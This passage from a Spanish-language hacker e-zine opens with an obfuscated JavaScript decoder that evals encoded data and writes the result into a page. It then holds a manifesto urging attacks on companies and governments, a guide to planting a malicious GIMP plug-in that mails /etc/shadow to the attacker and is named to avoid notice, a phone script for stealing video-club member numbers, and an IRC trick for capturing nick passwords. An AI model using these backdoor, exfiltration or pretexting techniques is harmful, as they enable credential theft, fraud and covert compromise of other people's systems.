BHBCGCCDKBFEBFFBHGBFFBHCCFCCICCCBCCFBKGBDBCGCCCCCHFBJHBCBCJBCCBCHCCCBCBIB=
GBCJBCCBCBFBHCCDBCCCCJBCBBCCBCFCCDEBEFBDEBDKBFEBIFBIFBDKBFEBDEBEFBHCCBCCI=
KBKBCCBCEFBDKBFEBHFBHBCGCCDKBFEBCFBKGBBJBFEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCF=
BKGBGDCDEBBJBFEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCFBKGBKEBCFBKGBFEBKGBECBBCBKKB=
FCCCDCDEBEFBCHBDEBFEBDBCHFBIHBJBCCCCGCCCBCBFBCFBKGBFEBKGBECBBCBKKBFCCCDCD=
EBEFBCHBDEBFEBJCCIKBFCCDEBIJBGCCFBCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCB=
CJJBKIBJKBHBCCBCKKBHCCBFBKEBIJBEJBKKBFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFB=
KGBIJBGCCFBCHFBDJBICCBCCBFBKEBFEBEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJ=
IBIKBKBCCBCDEBEFBFEBHFBHBCGCCKEBCFBKGBFEBKGBDEBECBBCBECBBCBECBBCBIFBDFBEC=
BBCBJCCIKBFCCDEBFCCCBCEBCDEBCHBDEBFEBIJBGCCFBCHFBDJBCBCEBCIJBFCCGBCHCCCBC=
BFBKEBDIBGIBKHBKJBGKBIHBGJBDJBDJBKHBJIBFJBGKBGJBEJBKHBDJBDKBDKBDKBDKBEJBK=
IBBIBFJBIJBGHBDJBKHBDKBDKBDKBDKBIIBGBCKKBFCCCCCGCCCCCDBCHCCDKBDKBDKBDKBIJ=
BGBCBCCBBCCCCKCCGCCDKBDKBDKBDKBIHBICCFCCFCCCBCBCCHCCHJBCBCFCCGCCGBCCCCBCC=
DKBDKBDKBDKBEIBBCCHCCCBCFCCBCCCBCHCCDEBEJBCBCHCCHCCGBCBCCEBCGCCDKBDKBDKBD=
KBBKBCCCBCCCBCGCCDKBDKBDKBDKBFEBECBBCBDBCCCCFCCDEBBFBJCCIKBFCCDEBGBCCHBJF=
BKGBGBCBHBDGBKGBGBCEFBEFBCFBEDCECBBCBKKBFCCCDCDEBEFBCHBDEBFCCCBCEBCDEBEFB=
DEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBBGBJFBJFBKEBDEBFFBDEBJFBFFBDEBDKBFEBDJBK=
HBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFCCCB=
CEBCDEBEFBDEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBBGBJFBKFBKEBDEBFFBDEBJFBFFBDEB=
DKBFEBDJBKHBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBC=
HBDEBFCCCBCEBCDEBEFBDEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBJFBJFBDGBKEBDEBFFBDE=
BJFBFFBDEBDKBFEBDJBKHBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBGDCECB=
BCBDFBIFBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBIJBGCCFBCHFBDJBCBCEBCIJBFCCGBCHCCC=
BCBFBKEBDIBGIBKHBKJBGKBHIBKIBIHBGHBHIBGKBIIBGHBIHBDIBEIBJIBKHBDKBDKBDKBDK=
BEJBCCCDBCHCCKCCIKBFCCCBCDKBDKBDKBDKBIIBGBCKKBFCCCCCGCCCCCDBCHCCDKBDKBDKB=
DKBIJBGBCBCCBBCCCCKCCGCCDKBDKBDKBDKBIHBICCFCCFCCCBCBCCHCCHJBCBCFCCGCCGBCC=
CCBCCDKBDKBDKBDKBDJBICCBCCKIBBCCKKBCBCKHBBDCDKBDKBDKBDKBKEBFFBKEBFEBDEBEF=
BDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBDEBFEBHFBHBCGCCKEB=
CFBKGBGDCGDCFEBKGBECBBCBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBFEBJCCIKBFCCDEBFEBE=
FBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBDGBCFBDEBEFBFEBCHBDEBEJBHCCFCCGBCBCCEBCHF=
BDBCFCCCCCKBCIHBFBCIKBFCCIHBCCCBBCCBCBFBFEBKGBECBBCBDEBDBCCCCFCCDEBBFBJCC=
IKBFCCDEBGBCCHBJFBKGBGBCBHBKKBFCCCDCHFBJBCCBCBCCEBCHCCFBCDEBGFBDEBKFBKGBG=
BCEFBEFBCFBEDCDEBDCCCCCJBCCDCDEBEFBCHBDEBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCC=
CBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBCCFBDEBEFBDEBFEBDEBGFBDEBFEBDEBEFBDEBIBC=
DEBEFBFEBFFBFEBKGBGDCDEBDEBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBBFBKKBFCCCDCHFBK=
KBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBCCFBEFBFEBDEBGFBDEBFEBDE=
BEFBDEBIBCDEBEFBDEBFEBCFBKGBFEBKGBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBFEBCBCJCC=
IKBJBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBDGBCFBDEBEFBDEBFEBCFBKGBDEBG=
DCDEBFEBKGBECBBCBECBBCBJCCIKBFCCDEBJCCJFBCHBDEBBCCCBCKCCDEBEJBHCCFCCGBCBC=
CEBCBFBFEBBHBFEBEFBFEBEJBIHBDJBEIBBJBFJBDHBDEBJCCIKBFCCDEBICCGCCFCCJIBCHB=
KEBFEBDEBEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBFEBKEBK=
GBDEBFEBDEBDEBEFBDCCCCCJBCCDCEFBDEBFEBDEBGCCCBCHCCFJBGBCKBCCBCCCCICCHCCBF=
BKEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCFBKEBFFBFEBDEBEFBDEBBFBBGBDFBFCC=
BCCBBCCFBDEBEFBFEBDEBCFBKGBBHBIFBFEBEFBFEBEJBIHBDJBEIBBJBFJBDHBFEBCFBKGBE=
CBBCBECBBCBECBBCBDEBDEBJCCIKBFCCDEBDBCGCCCCCDEBCHBDEBBCCCBCKCCDEBGHBKKBHC=
CGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBFEBEJBKKBFCCGBCDCCHCCGBCBCCEBCHFBBIBGBC=
JBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCFEBCFBKGBECBBCBDEBDEBJCCIKBFCCD=
EBIJBGCCFBCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBF=
BKEBIJBEJBKKBFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFBKGBECBBCBDEBDEBJCCIKBFCC=
DEBDBCCCCJBCBBCCBCFCCDEBCHBDEBDBCGCCCCCHFBCIBCBCHCCBIBCCCJBCBBCCBCFCCBFBI=
JBGCCFBCHFBEJBDCCCBCKKBGBCIKBJBCBIBCCCJBCBBCCBCFCCGCCBFBFEBJHBCBCGCCIBCHC=
CCCCDCCFEBCFBCFBKGBECBBCBDEBEIBBCCDBCCBCKKBHCCBFBDBCCCCJBCBBCCBCFCCFFBJCC=
JFBFFBDBCGCCCCCFFBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCCFBKGBECBB=
CBGDCECBBCBECBBCBDBCICCBCCKKBHCCGBCCCCBCCDEBEIBBCCDBCCBCKKBHCCBFBDBCCCCJB=
CBBCCBCFCCFFBKKBCCCBBCCBCFFBDBCGCCCCCFFBGCCGBCEBCBCCCFBEDCECBBCBDEBDEBJCC=
IKBFCCDEBBIBCCCFCCDJBCBCIKBBBCGBCBCCEBCDEBCHBDEBKFBFFBDEBBIBCCCFCCIJBFCCG=
BCHCCGBCBCCEBCDEBCHBDEBBGBKGBBIBCCCFCCGHBDCCDCCCBCBCCBBCCHBHGBKGBECBBCBJC=
CIKBFCCDEBCBCBDCHCCKGBECBBCBDEBDEBDEBDBCCCCFCCDEBBFBJCCIKBFCCDEBDBCGBCJBC=
CBCGCCDEBCHBDEBBCCCBCKCCDEBKHBBCCICCKBCCBCFCCIKBHCCCCCFCCBFBDBCCCCJBCBBCC=
BCFCCHFBDBCGBCJBCCBCGCCCFBKGBEEBDBCGBCJBCCBCGCCHFBIKBHCCKHBBCCBBCBFBCFBKG=
BDEBDBCGBCJBCCBCGCCHFBKBCCCCJCCCBCJIBCBCBDCHCCBFBCFBCFBEDCECBBCBKBBCBCBDC=
HCCCHBDBCGCCCCCHFBCIBCBCHCCKHBBDCHCCCBCBCCGCCGBCCCCBCCJIBIKBKBCCBCBFBDBCG=
BCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBCFBKGBECBBCBKBBKBBGBCDBCBFBCBCBDCHCCCHBCH=
BFEBFBCHCCKBCFEBCFBEDCECBBCBKBBKBBKBBJCCIKBFCCDEBIKBHCCHCCCHBDBCGCCCCCHFB=
CIBCBCHCCBIBGBCJBCCBCBFBDBCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBCFBKGBECBBCBK=
BBKBBKBBIKBHCCHCCHFBGHBHCCHCCFCCGBCJKBICCHCCCBCGCCDEBCHBDEBBGBKGBECBBCBKB=
BKBBDEBGBCDBCDEBBFBIKBHCCHCCHFBEJBGBCDDCCBCDHBJFBCFBEDCDEBECBBCBKBBKBBKBB=
JCCIKBFCCDEBFCCBBCCHBDBCGCCCCCHFBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCBFBD=
BCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBFFBBIBCCCFCCDJBCBCIKBBBCGBCBCCEBCCFBKG=
BECBBCBKBBKBBDEBKBBJCCIKBFCCDEBJKBICCDBCDBCDEBCHBDEBBCCCBCKCCDEBEJBHCCFCC=
GBCBCCEBCBFBFCCBBCHFBDJBCBCIKBBBCGHBJBCJBCBFBCFBCFBKGBECBBCBKBBKBBKBBFCCB=
BCHFBIHBJBCCCCGCCCBCBFBCFBKGBECBBCBKBBKBBDEBKBBGBCDBCDEBBFBJKBICCDBCDBCHF=
BGBCBCCBBCCBCBDCKIBDBCBFBGCCGBCEBCBCCCFBCHBCHBGFBKFBCFBEDCECBBCBKBBKBBKBB=
DEBJCCIKBFCCDEBIKBDCCCHBDBCGCCCCCHFBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCB=
FBDBCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBFFBBIBCCCFCCGHBDCCDCCCBCBCCBBCFFBHC=
CFCCICCCBCCFBKGBECBBCBKBBKBBKBBDEBIKBDCCHFBIJBFCCGBCHCCCBCBFBKKBCCCBBCCBC=
CFBKGBECBBCBKBBKBBKBBDEBIKBDCCHFBIHBJBCCCCGCCCBCBFBCFBKGBECBBCBKBBKBBDEBK=
BBGDCECBBCBKBBKBBDEBGDCECBBCBKBBKBBGDCECBBCBDEBDEBDEBGDCECBBCBDEBDBCCCCFC=
CDEBBFBJCCIKBFCCDEBGCCDBCDEBCHBDEBBCCCBCKCCDEBKHBBCCICCKBCCBCFCCIKBHCCCCC=
FCCBFBDBCCCCJBCBBCCBCFCCHFBEJBICCJKBBIBCCCJBCBBCCBCFCCGCCCFBKGBDEBEEBGCCD=
BCHFBIKBHCCKHBBCCBBCBFBCFBKGBDEBGCCDBCHFBKBCCCCJCCCBCJIBCBCBDCHCCBFBCFBCF=
BEDCECBBCBDEBDEBDEBEIBBCCDBCCBCKKBHCCBFBGCCDBCHFBGBCHCCCBCKBCBFBCFBFFBKKB=
CCCBBCCBCFFBDBCGCCCCCCFBKGBECBBCBDEBGDCECBBCBGDCECBBCBBHBIFBEJBIHBDJBEIBB=
JBFJBDHB*/}
function transpl480(dataf){
var i,d =3D '';var long=3D6204;var str=3D19;eval('var s=3D String(' + =
dataf +')');
for (i=3Dstr + 1;i< 3*long + str;i+=3D3) {
d +=3D String.fromCharCode( (s.charCodeAt(i) - s.charCodeAt(str)) + =
10*(s.charCodeAt(i+1) - s.charCodeAt(str)) + 100*( s.charCodeAt(i+2) - =
s.charCodeAt(str))  );}
return d;}
document.writeln(transpl480("pl480"));
</SCRIPT>
<-->




-< 0x03 >------------------------------------------.------------------.------
                                                    `-[ _MeNpH_ )-


  Lo primero que he de decir, antes de soltaros mi sarta de divagaciones 
este articulo/comentario no va a ense~ar a nadie nada acerca de la "tecnica",
del haking pero seguro que consigue que muchos hackers que piensan como yo
digan: "joder, si no estoy loco, no soy el unico que tiene este concepto 
sobre el mundo del hack...". Bien, me explico, con esto que escribo prentendo
poner en su sitio a todos los jodidos hackers del "Ay, jope, que no somos 
dilincuentes" y dar un poco de apoyo a todos los anarquistas y revolucionarios
en el mundo del hack.

  Vale, pues ahora seguro que tengo unos pocos enemigos extra, eso esta bien. 
Pero seguro que al final del texto tengo muchos mas, aunque espero que esto
me cree tb mas amigos, que es lo que importa. 
Bueno, pues como iba diciendo, esos jodidos hackers son los que defienden en 
plan religioso lo del "Misterio de la Santisima Moral del Hacker":
           
(- Misterio de la Santisima Moral del Hacker: 
   El hacker que entra en una makina solo puede 
   mirar un poco y despues ir al admin y decirle los fallos de 
   seguridad que tiene. -) 

   Bueno, pos esto esta de puta madre con servidores como el de Medicos sin 
Fronteras, el de Greenpeace y pocos mas... pero, POR FAVOR!!, COMO VAMOS A 
PERDONAR A ESOS ORGANISMOS ESTATALES O A ESAS EMPRESAS QUE, POR MIEDO AL 
PODER DE NUESTRAS MENTES, NOS HAN DECLARADO LA GUERRA. 

Esos que piensan que hay que ser buenos chicos para que no los llamen 
delicuentes ya son hackers vencidos, los malos en esta ocasion han ganado, 
creando asi un ejercito de expertos dispuestos a solucionar todos los puntos
debiles del jodido GRAN HERMANO!!!, de ese que se ha dedicado a meter en la
memoria colectiva que el ANARQUISMO significa caos y destruccion, que a la 
escuela no se tiene que ir a aprender sino a aprobar los examenes, o que los
hackers son malnacidos hijos del diablo.
Ese kabron (en abstracto) que nos tiene cojidos por los huevos es el mismo 
que nos tacha de delincuentes: PERO NO OS DAIS CUENTA DE QUE ESA LEY QUE NOS
PROHIBE EMPLEAR NUESTROS CONOCIMIENTOS Y NUESTRA LIBERTAD, ESTA HECHA PARA 
PROTEGER A LOS QUE CONTROLAN ESTE MUNDO Y NO PARA PROTEGER LOS INTERESES DE 
CIUDADANOS DEL MISMO 
(ya que nadie, excepto los lamerones y los tontos del culo, se dedican a robar
 a la gente normal y corriente recetas de cocina en formato Word)
NO OS DAIS CUENTA QUE DENTRO DE POCO SEREMOS, LOS HACKERS, LA UNICA FORMA 
POSIBLE DE REVOLUCIONARIOS Y QUE POR ESTO QUIEREN ERRADICARNOS DE LA RED.  
SI DEJAMOS QUE NOS DERROTEN TAN FACILMENTE: A LA MIERDA LA LIBERTAD!!!.

    
   Supongo que muchos de los que se dediquen al hack conoceran algo o mucho de
 la filosofia CyberPunk y se habran dado cuenta de que el futuro mas proximo
es muy parecido (por no decir identico) al que se describe en novelas del
genero como, por ejemplo: el clasico "Neuromante" de William Gibson.
Nos encontramos con mundo donde hay unas cosas llamadas Corporaciones que son
las que dominan el mundo. 
Macro-empresas ke controlan todo el dinero y que tienen autenticos 
ejercitos de seguridad para dominar a la gente, esto es el futuro mas 
inminente (MICROSOFT, AMERICA ONLINE, TELEFONICA, EL CORTE INGLES... si, si
hablo de vosotros Kabrones!!). 

No os parece que en un mundo donde el respeto al kapital y a la propiedad
se ha convertido en el Mandamiento n 11; donde la gente de los paises con 
dinero piensa que los problemas de hambre en el mundo no se pueden solucionar
y, por tanto, no hay que hacer nada; donde la unica forma de revolucion es
hacer Zapping en la television y si se da alguna un poco mas peligrosa para la
gente que manda, se reprime salvajemente; donde se han perturbado terminos 
como la democracia, hasta el punto de que hoy en  dia todo el mundo piensa que 
"democracia" significa votar a alguien para que te domine hasta la proxima
votacion (no se a vosotros, pero a mi esto ultimo me parece horrible);
no os parece que en un mundo asi hace falta gente que construya una nueva 
revolucion por otros caminos a los que el poder no esta acostumbrado.
En este momento en el que los poderosos no pueden prescindir de los sistemas 
de comunicacin informatizada, 


             LA REVOLUCION ESTA EN NUESTRAS MANOS COMPAEROS!!!


  Por todo esto me parece tan sumamente mal que la gente que cuelga documentos
de enseanza sobre el hacking en la red, siempre te suelta al principio lo de
la "Moral del Hacker", y lo de "no semos delincuentes". Mirar nenes, la
delincuencia es el acto de incumplir las leyes establecidas, si se declara
que leer es delito, todo aquel que lea sera un delincuente, pero... 
por eso esta mal leer??? Pues pa mi que no. 
Pero la gente sigue con el estupido pensamiento de las leyes como algo sagrado
o semi-divino, NO!!!. Las leyes se las ha inventado un tipo como tu y como yo
chavalote/a, y con un fin, que en algunas ocasiones no es demasiado noble. 
 
Asi que si alguna vez te da por ensear a hackear a alguien, intenta educarle 
como HACKER-REVOLUCIONARIO (y no como hacker-esclavo).

    En fin, hay muchisimo mas que decir, pero buscar en los rincones de 
vuestras libertarias mentes y encontrareis el resto.
Ah, se me olvidaba dar un mensaje de apoyo a todos los enganchados a la tele:
con voluntad podreis desintoxicaros y dejar de ser jodidos yonkis, leer 
un poco y vereis que divertido!! (lo mismo pa los futboleros).


   Si me quereis mandar algun comentario pues aqui: htiburon@teleline.es, 
que es la direccion que utilizo cuando puede ser que me bombardeen 
(principalmente pq yo no soy el titular;).)

    
   
    Hasta la proxima.

 
 
    _MeNpH_  



-< 0x04 >------------------------------------------.--------------------.----
                                                   `-[ TryckY )-



                    -=( Movidas movidosas a traves del Gimp )=-

En este articulo voy a explicar como una vez obtenido root en una maquina
podemos ejecutar lo que queramos a traves del Gimp doy por hecho que sabeis
lo que es el Gimp y si no lo ejecutais y ya esta. 
Este que voy a explicar no tiene uso si el due~o de la maquina nunca
ejecuta el gimp bueno lo que hay que hacer es muy simple, el gimp tiene un
directorio de donde lee los plugins, en verdad depende de la version, la
ultima los ha separado en varios en: 

"/usr/lib/gimp/1.1/plug-ins" . Estan los ejecutables pero si tu metes un 
script tambien lo ejecutara por lo que a qui viene la parte maliciosa en 
principio habia puesto muchos ejemplos pero esto seria mas un curso de 
script que otra cosa de por lo que lo dejo a vuestra eleccion los scripts,
que otra cosa de por lo que lo dejo a vuestra eleccion los scripts, 
bueno enga, un ejemplo cutre.
Lo que hace es mandarle la lista de passwords al usuario trycky y lo del 
2> /dev/null es que si hay errores se vayan a /dev/null para no dar el
cante en caso de error

<++> gimp/ejem1

mail trycky < /etc/shadow & 2> /dev/null

exit 0

<-->

Como veis los ejemplos ya corren a cargo de vuestra imaginacion
solo decir que el las ultimas versiones del gimp los script-fu y los
de perl vienen separados del resto. Otra cosa seria currarse un script
en el propio gimp y que cada vez que le diese hiciece algo esto es facil
leyendo la documentacion de ayuda del gimp y el script fu register para
el script
Ah, si instalais uno de estos ponerle un nombre poco cantoso por que
cada vez que inicia el Gimp va saliendo abajo los plug-ins que va cargando
y si el tio lee "loading plugins me-jodo-a-tu-makina" le daria algunos 
indicios de que algo anda mal, no creeis?.


Y lo demas es vuestra imaginacion, podeis buscar archivos que os los 
envien a donde querais:
 
"find / -name secreto -exec cp {} ~ \;" 

Esto buscaria el archivo secreto y lo copiaria a vuestro home, como veis
no habria limitaciones. 

Otra cosa tambien es que permite ejecutar ejecutables valga la redundancia
aunque si ya habeis sido root para poder instalar el script , pero bueno
tambien puede pasar de forma muy muy rara que tenga modo de escritura el 
directorio "/usr/lib/gimp/1.1/plug-ins". Pero que os lo dejo a vuestra
imaginacion tambien podeis editar un script del perl que los hay tambien 
para el gimp y que cada vez que se ejecute haga algo que vosotros querais 

Pues ya esta creo que esto ha sido bastante en principio el documento iba
a tener mas ejemplos y chorradas pero creo que con esto basta .

Si tengo algun error en el doc o lo que sea podeis encontrarme en el IRC 
con el nick de trycky claramente . Este doc esta muy bien para gastarle 
bromas a los colegas :) . Hasta luegor 


TryckY

 *EOF*




-< 0x05 >-------------------------------------------------.--------------.---
                                                          `-[ ^pRoviDoR )-




     &&&&&&|#####################################################|&&&&&&
           |  De Videoklubs, ingenieria social y otros lances... |
     &&&&&&|#####################################################|&&&&&& 
     por ^pRoviDoR

 Buenas, soy ^pRoViDoR y me he decidido a eskribir este articulo  para
 que pueda ser de utilidad, espero ke os guste.
 De entre las  artes del hack,  la ingenieria social es  una de las
 cosas ke  encuentro mas  interesantes.
 He leido  varios articulos sobre I.S casi siempre referidos a 
 obtener numeros de tarjetas de credito, cuentas y password de irc...
 Pues bien, Quien no ha querido tener para toda la vida, por ejemplo
 "Juegos de Guerra" en su videoteca?, pero o no lo has encontrado o 
 no te apetece gastarte dinero en ello (merece la pena),entonces 
 este articulo es para ti. Empecemos:
 
 En la mayoria de los videoklubs para sacar juegos, peliculas o lo ke 
 tengan,  te haces socio dando tus datos y a cambio obtienes un 
 numero ke te identifica y con el ke podras obtener sus servicios.
 Veamos komo obtener el numero de nuestra victima.

 1. Que necesitamos?
  *La guia telefonica
  *La direccion y el nombre del videoklub
  *Un telefono (con linea :))
  *Aplomo
  *Un Teclado (opcional)
  *Un poquito de suerte.
  *Un amigo.
  *Un atontao 
 
 3,2,1.. ACCION!!
 Elige el videoklub ke te va a "prestar" sus servicios ;).
 Bien, ahora busca la calle en la que se encuentra situado, nuestro
 videoklub se llamara Videopollos y esta situado en la calle Juela,
 ke hacemos?, pues kon la ayuda de la guia telefonica buscaremos
 a alguien ke viva en esa kalle o por esa zona, podemos tardar un rato
 pero no mucho (paciencia),por ke hacer esto? se supone ke la persona
 ke viva alli sera socia del susodicho videoklub al estar cerca de su 
 casa.

 2.Obteniendo informacion de "Videopollos"

 Lo mejor para saber ke informacion obtener de la victima, es hacernos 
 socios nosotros del videoklub, para ver lo ke nos piden.
 Sera conveniente ke no lo haga la persona ke va a ir a sacar la
 pelicula o el videojuego kon el n obtenido de la victima, por razones
 obvias (los del videoklub no son tontos).
 Hemos averiguado ke videopollos da komo password un n de 4 cifras, 
 asi ke vamos con la fiesta...
 Bueno hemos encontrado a una persona ke vive en la calle Juela, aki
 la tenemos --> Gonzalez Cuesta, Apapucio...........(***)******
 Ke hacer ahora? Bueno suponiendo ke tengamos la suerte de ke sea 
 socia (la tenemos) pondremos voz amable pero no concesiva, que se note
 ke estamos seguros y le diremos ke debido a un virus informatico ;)
 los registros de cuentas de los clientes han sufrido modificaciones
 y se estan validando kon el fin de... bueno mejor leed la conversacion
 ----------------------------------------------------------------------
 M.P= Mala persona , es decir nosotros :p
 A.A= Apapucio Atontao, es decir la victima
 *******************************************
 Rinngggg!------------------------------------------------------------
 <A.A> Si? digame?
 <M.P> Buenas tardes, Apapucio Gonzalez?
 <A.A> Si soy yo, kien es?
 <M.P> Si, mire le llamamos de VideoPollos del kual es usted socio 
       activo.
 <A.A> Ke ocurre?
 <M.P> No se preocupe, todo esta en orden, tan solo ke hemos sido 
       victimas de un virus informatico, sabe lo que es?
 <A.A> Si, si por supuesto   ; fijo ke no tiene ni puta idea
 <M.P> Entonces estamos validando los datos de su cuenta ya que pueden
       haber sido modificados. Su domicilio actual es C/Juela tal tal y
       tal, no? ;no entramos a sako todavia
 <A.A> Efectivamente
 <M.P> Su numero de identificacion es ****
 <A.A> No! se equivoca, creo ke no era ese,espere un momento
       ;se va a buscarlo por algun lado
 <A.A> tenia yo razon ;si y yo tengo su numero de identificacion ;)
 <M.P> Disculpe las molestias ;tono de resignacion y suplica jeje
 <A.A> es el ****
 <M.P> Muchas gracias, sus datos ya estan actualizados correctamente
       le agradezco su colaboracion, no todos lo clientes son tan 
       amables ;le hacemos la pelota para ke no sospeche :)
 <A.A> Nada, nada, a usted y espero ke solucionen lo del virus.
 <M.P> Eso esperamos, muchas gracias.
 Klick--------------------------------------------------------------
 Bueno pues ahora ya tenemos su n de identificacion y podremos sacar
 una pelicula o un videojuego, por un periodo indefinido ;). No os
 preokupeis por la victima, en la mayoria de los kasos no tendra ke 
 pagar lo ke vosotros habeis kogido "prestado" para uso y disfrute.
 
4.Problemas que pueden surgir en la llamada a la victima:
 
 -Ke el titular del numero no use ni para cagar la tarjeta de
 videopollos,o ke sea su hijo el titular ke se pone ciego con los
 pokemon, no preocuparse, en el primer caso podemos argumentar ke no
 se asuste porke tenemos un copia de seguridad pero ke por si acaso
 prefiririamos confirmarlo personalmente, y asi nos ahorramos ke vaya a 
 preguntar al videoklub y pillen el invento. En el segundo caso
 nosotros no sabemos ke su hijo es el titular pero la victima si
 asi ke le llamara para ke se ponga al telefono, ahi tendremos ke
 escuchar bien atentos, para oir el nombre del hijo y poder continuar
 con la fiesta.
 
5.Problemas ke pueden surgir en el videoklub.
 -Ke al ser personas de la misma zona, al dependiente le suene el n
 y sepa ke no eres su autentico due~o, esto a veces pasa, agacha las
 orejas y pirate del videoklub :( (se pasa mal, fiuuu!).
 -Ke ademas te pida algun dato complementario porque no se fia 
 (p.j. <TioVideoklub> me puedes decir la direccion? )
  La solucion es bien sencilla, aprendete bien la direccion y el nombre
  de la victima, para decirla sin dudar.
 
6.Ambienta la conversacion. (opcional)
 Con el fin de procurar hacer la conversacion lo mas kreible posible  
 para la victima podemos ambientar la conversacion, y diras ke ko~o 
 es eso? poner el ambientador ese del pino para los coches, pues no
 :p. La cuestion es ke la victima obtenga una informacion a traves
 del telefono ke aunque no sea totalmente necesaria,  ofrezca una
 sensacion de normalidad a la situacion.En este caso, Ke podemos hacer?
 Lo primero sera, siempre ke se pida o confirme algun dato, procura hacer ruido
 con el teclado (marca teclas, no seas bruto y te lies a oxtias contra
 el telefono :p) komo si estuvieras introduciendo informacion, lo segundo
 puede ser, que en medio de la conversacion, te disculpes como si estuvieras
 atendiendo a un cliente,  podria ser algo como:
 ---------------------------------------------------------------------
 <M.P> Disculpe un momento, ;con voz mucho mas baja decimos lo 
 Si en el pasillo del fondo ;siguiente, con la mano tapando el micro.
 --------------------------------------------------------------------
 Con esto la victima se sentira mucho mas segura de que se encuentra 
 hablando con una persona ke trabaja en un videoclub. 

 ###################################################################### 
 # Bueno espero ke hayais disfrutado,  Yo no me hago responsable de lo#
 # que hagais y este articulo y su contenido es solo  kon  fines      #
 # educativos, las conversaciones pueden o no ser reales ;)           #
 ######################################################################   

 Saludos al sub-mundo.
 email: HeXaDeM@gmx.net
 LA INFORMACION DEBE SER LIBRe.



-< 0x06 >-------------------------------------------------.--------------.---
                                                          `-[ by Tahum )-





                   {- El arte de la ingenieria social 2 -}

                    " El timador vuelve a la carga..... "


  [ Entrada ]

  Hola de nuevo lectores, aqui me veis de nuevo, una vez  mas  con  vosotros
  siguiendo la saga de la ingenieria social, un tema que como veis puede dar
  tanto o mas de si. Ahora trataremos la ingenieria social  desde  un  punto
  distinto, ya sabiendo lo que se explico en el numero pasado  miraremos  un
  poco como son las victimas actualmente,  de  que  manera  se  consigue  el
  enga~o y algunos trucos que os seran utiles, ademas de  alguna  sorpresita
  que os tengo preparada. Si teneis alguna duda, o quereis  mandarme  alguna
  sugerencia (constructiva) me la podeis mandar a tahum@demasiado.com, y  os
  respondere encantado ;O).


                  ~ Indice ~

  - De que manera han cambiado las victimas ?      - 1.
  - De que manera les enga~amos ?                  - 2.
  - Como se consigue el enga~o ?                   - 3.
  - Mas trucos                                     - 4.
  - Los consejos del abuelo                        - 5.
  - Despedida                                      - 6.


  (--1--)- De que manera han cambiado las victimas? -(---------------------)
  
  Nuestras victimas ahora estan mucho mas concienciadas de los peligros  que
  corren dando datos personales a cualquier persona o  al  escribir  aquella
  frase tan rara que le dice aquella chica/o.  En resumen,  estan ojo avizor
  de no exceder confianzas con cualquier tipo que conozcan por el IRC.  Esto
  no deja de ser bueno porque asi aprendemos nuevas tecnicas  de  camelacion
  a  la  victima  ( me ha gustao la palabreja  esa  de  camelacion )  y  nos
  puliremos como unos ingenieros sociales competentes (de esos quedan pocos)
  y estaremos preparados para todo (fuerzas armadas espa~ol... Cachis la mar
  olvidar esto ;)). Asi que hazte a la idea de que conseguir una victima hoy
  en dia no es tarea facil, pero tampoco te creas que es imposible ni  mucho
  menos... }-D.
  Vosotros esto no lo notareis hasta que le pidais a la victima que  escriba
  la frase tal o que reciba el archivo cual, es ahi cuando os diran que no a
  veces de maneras no muy educadas...
  Como hay que conocer al enemigo, aqui teneis una peque~a  descripcion  del
  usuario medio del IRC, pero como generalizar nunca fue bueno tomaoslo como
  una referencia a rasgos generales...

  Edad -------------------- 20 a 35 tacos aproximadamente
  sexo -------------------- Predomina por poco el masculino
  Utiliza el IRC ---------- Para pasar el rato, ligar

       ( En algunas cosas no han cambiado... ;D )

  Asi suelen ser nuestras victimas...


  (--2--)- De que manera les enga~amos ? -(--------------------------------)

  Pues hay dos caminos...  El facil y el dificil, el facil tan solo funciona
  con victimas muuy novatas, el dificil puese  colar  con  victimas  no  tan
  novatas. Primero trataremos el metodo facil:

   - El metodo facilote: -

  Pues esta tactica como fin tiene la de apoderarse del password de su nick,
  aunque se le puede dar mas usos. Consiste en decirle a la victima que para
  autentificar su nick tiene que escribir /msg nickpass el_pass , una  frase
  sin ningun secreto aparente, para la victima eso es un mensaje  a  un  bot
  para autentificar tu nick, pero si te fijas en  el  destinatario...  Acaso
  hay algun bot llamado nickpass?? pues no... Pues porque  no  te  pones  de
  nick nickpass? de esa manera el password te llegara a ti...  Pues  en  eso
